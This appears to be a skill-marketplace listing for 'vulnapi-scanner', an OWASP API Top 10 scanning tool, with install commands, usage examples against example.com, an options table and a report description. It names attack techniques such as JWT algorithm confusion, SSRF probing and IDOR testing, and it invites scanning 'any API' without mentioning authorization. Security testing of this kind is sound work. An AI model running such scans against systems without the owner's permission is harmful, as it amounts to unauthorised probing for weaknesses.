vulnapi-scanner
OWASP API Security Top 10:2023 vulnerability scanner. Scan any API for auth bypass, IDOR, SQLi, RCE, rate limiting gaps, JWT vulns, SSRF, and more.
/skill install vulnapi-scannervulnapi-scanner
A comprehensive OWASP API Security Top 10:2023 vulnerability scanner built on top of the battle-tested cerberauth/vulnapi engine. Designed for developers, security engineers, and penetration testers who need fast, accurate API security assessments without leaving their Anvil workflow.
What It Does
vulnapi-scanner performs automated security scans against REST APIs, GraphQL endpoints, and gRPC services. It detects vulnerabilities mapped to the OWASP API Security Top 10:2023 including:
- API1 - Broken Object Level Authorization (BOLA/IDOR): Detects endpoints that expose other users' data by manipulating IDs
- API2 - Broken Authentication: Tests for weak JWT signing, missing expiry, algorithm confusion (RS256→HS256), and bearer token leakage
- API3 - Broken Object Property Level Authorization: Identifies mass assignment and over-exposed fields
- API4 - Unrestricted Resource Consumption: Rate limiting gap detection, resource exhaustion vectors
- API5 - Broken Function Level Authorization: Admin endpoint discovery, HTTP method fuzzing
- API6 - Unrestricted Access to Sensitive Business Flows: Workflow abuse detection
- API7 - Server Side Request Forgery (SSRF): Internal network probing via URL parameters
- API8 - Security Misconfiguration: CORS misconfig, verbose errors, debug endpoints, missing security headers
- API9 - Improper Inventory Management: Shadow API discovery, deprecated endpoint detection
- API10 - Unsafe Consumption of APIs: Third-party integration security checks
The scanner covers 540+ endpoint patterns and generates structured JSON reports suitable for CI/CD integration, ticketing systems, and compliance documentation.
Installation
anvil skill install vulnapi-scanner
Usage
Basic Scan
/vulnapi https://api.example.com
Authenticated Scan (Bearer Token)
/vulnapi https://api.example.com --auth bearer:YOUR_TOKEN_HERE
Authenticated Scan (API Key)
/vulnapi https://api.example.com --auth apikey:x-api-key:YOUR_KEY
Scan with OpenAPI Spec
/vulnapi https://api.example.com --spec ./openapi.yaml
Targeted Scan (specific checks)
/vulnapi https://api.example.com --checks jwt,cors,ssrf --auth bearer:TOKEN
CI/CD Mode (exit code on findings)
/vulnapi https://api.example.com --auth bearer:TOKEN --fail-on high
Configuration Options
| Option | Description | Default |
|---|---|---|
--auth | Authentication method (bearer, apikey, basic) | none |
--spec | Path to OpenAPI/Swagger spec file | auto-discover |
--checks | Comma-separated list of checks to run | all |
--fail-on | Exit non-zero on: low, medium, high, critical | none |
--output | Output format: json, sarif, html | json |
--timeout | Request timeout in seconds | 10 |
--rate-limit | Max requests per second | 20 |
--depth | Crawl depth for endpoint discovery | 3 |
Report Output
Reports include severity ratings (critical/high/medium/low/info), CWE IDs, CVSS scores, affected endpoints, evidence, and remediation guidance. JSON output is compatible with GitHub Security tab (SARIF format) and DefectDojo import.
Requirements
- Active Anvil session with network access to target API
- For authenticated scans: valid credentials for the target API
- Target API must be reachable from the Anvil execution environment
Reviews
No reviews yet. Be the first!
Related Skills
Browser DevTools Mastery
Master Chrome DevTools for performance profiling, network analysis, memory debugging, and breakpoints.
TypeScript tRPC APIs
Build end-to-end type-safe APIs with tRPC, routers, procedures, middleware, and React Query integration.
Playwright E2E Testing
Write reliable end-to-end tests with Playwright, use locators, handle auth state, and run in CI.